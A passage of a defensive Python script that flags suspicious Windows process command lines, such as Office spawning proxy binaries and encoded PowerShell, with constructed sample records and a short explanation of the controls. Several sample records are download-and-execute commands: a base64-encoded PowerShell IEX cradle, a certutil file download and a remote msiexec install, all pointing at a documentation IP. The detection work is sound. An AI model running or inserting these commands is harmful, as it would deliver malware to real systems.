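    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def triage_cmdlines(records):
    """Return {ProcessId: sorted tags} for every record matching at least one heuristic."""
    flagged = {}
    for rec in records:
        image, parent = basename(rec["Image"]), basename(rec["ParentImage"])
        text = rec["CommandLine"]
        tags = set()
        decoded = decode_encoded_command(text) if image in ("powershell.exe", "pwsh.exe") else None
        if decoded:
            tags.add("powershell-encoded")
            text = text + " " + decoded          # apply the same rules to the decoded script
        for img_re, cmd_re, tag in RULES:
            if re.fullmatch(img_re, image) and re.search(cmd_re, text, re.I):
                tags.add(tag)
        if parent in OFFICE and image in PROXIES:
            tags.add("office-spawned-proxy")
        if tags:
            flagged[rec["ProcessId"]] = sorted(tags)
    return flagged


# Constructed records; 198.51.100.0/24 is a documentation range, not a real host.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_RECORDS = [
    {"ProcessId": 1, "Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL'},
    {"ProcessId": 2, "Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"rundll32.exe C:\Users\bob\AppData\Local\Temp\up.dll,#1"},
    {"ProcessId": 3, "Image": PS, "ParentImage": CMD, "CommandLine": f"powershell.exe -nop -w hidden -enc {ENC}"},
    {"ProcessId": 4, "Image": r"C:\Windows\System32\certutil.exe", "ParentImage": CMD,
     "CommandLine": r"certutil.exe -urlcache -split -f http://198.51.100.7/x.bin C:\Users\Public\x.bin"},
    {"ProcessId": 5, "Image": r"C:\Windows\System32\svchost.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\system32\svchost.exe -k netsvcs -p"},
    {"ProcessId": 6, "Image": r"C:\Windows\System32\wuauclt.exe", "ParentImage": CMD,
     "CommandLine": r"wuauclt.exe /UpdateDeploymentProvider C:\Users\Public\h.dll /RunHandlerComServer"},
    {"ProcessId": 7, "Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": CMD,
     "CommandLine": r"msiexec.exe /q /i http://198.51.100.7/p.msi"},
    {"ProcessId": 8, "Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for pid, tags in triage_cmdlines(SAMPLE_RECORDS).items():
        print(pid, ", ".join(tags))
```

Records 1, 5 and 8 are the controls: rundll32.exe with a System32 DLL, a normal svchost.exe, and an administrator's signed backup script with -ExecutionPolicy Bypass, none of which should fire. Record 3 only becomes visible because the encoded command is decoded first; the raw command line contains nothing but -nop -w hidden and a base64 blob.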
